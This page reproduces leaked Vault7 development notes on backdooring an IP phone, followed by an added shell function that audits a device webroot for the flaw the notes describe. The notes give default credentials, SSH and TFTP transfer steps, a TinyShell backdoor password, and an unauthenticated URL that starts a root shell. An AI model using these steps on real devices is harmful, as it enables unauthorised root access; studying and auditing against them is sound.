Vault7: CIA Hacking Tools Revealed
sontaran
Development Notes
Credentials
- https://10.3.2.151/
- phone menu password – 123456
- web interface admin – 123456
System Configuration
- webroot = /Opera_Deploy/appWeb/web
- Phone runs linux-2.4.31
- Processor is MIPS-BE
Establishing Initial Access for Development
- Use the hive-builder 10.2.5.2 (or another) to cross-compile code for the phone.
- The phone temporarily allows SSH access to the admin user via the web interface (Administrator Pages > Maintenance > Secure Shell).
- Files can be transferred to the phone via TFTP (don't forget to chmod a+x the file once it is transferred to the phone).
    phone$ tftp -g -r <filename> <hostname> <port>
    wrkstn$ sudo /usr/sbin/in.tftpd --daemon --port 6969 /tmp (this is for atftpd)
- The web server attempts to execute (yes, execute) any page requested by a client.
- The webroot directory is writable by the admin user.
- TinyShell (tsh) has been compiled for the phone for port 12345 and password "wboKtbEYVTWAVIig". Using the admin user via SSH and TFTP, tsh was put in /usr/sbin and the webroot. Additionally, a script named tshd.cmd has been placed in the webroot. To start tsh, request this page: https://10.3.2.151/tshd.cmd . Web interface credentials are not required. The page will return an error, but in the background it will start tsh with root privileges. Use the tsh client to connect for a root shell.
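
The last three notes describe a web server that executes whatever file is requested, from a webroot that a non-root account can write to. As an added example (not part of the original notes), here is a shell function that audits an extracted or mounted copy of a device filesystem for that condition. The function name, the finding labels and the use of group/other write bits as the "non-root can write" test are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a webroot on an extracted or mounted filesystem copy.
# Finding labels (WRITABLE-DIR, EXEC, ELF) are this example's own.
# Usage after sourcing: audit_webroot rootfs/Opera_Deploy/appWeb/web

audit_webroot() {
    root=$1
    if [ ! -d "$root" ]; then
        echo "not a directory: $root" >&2
        return 2
    fi

    # Directories writable by group or other: a non-root account can plant
    # files that the web server would then run on request.
    find "$root" -type d \( -perm -020 -o -perm -002 \) \
        -exec printf 'WRITABLE-DIR %s\n' {} \;

    # Regular files with any execute bit set (scripts or binaries).
    find "$root" -type f \( -perm -100 -o -perm -010 -o -perm -001 \) \
        -exec printf 'EXEC %s\n' {} \;

    # Native binaries, whatever their mode: compare the first four bytes
    # with the ELF magic 7f 45 4c 46.
    find "$root" -type f | while IFS= read -r f; do
        magic=$(od -An -tx1 -N4 "$f" | tr -d ' \n')
        if [ "$magic" = "7f454c46" ]; then
            printf 'ELF %s\n' "$f"
        fi
    done
    return 0
}
```

Any finding under a webroot served by a server that executes requested files deserves review; an ELF file there is the strongest signal, since static web content never needs one.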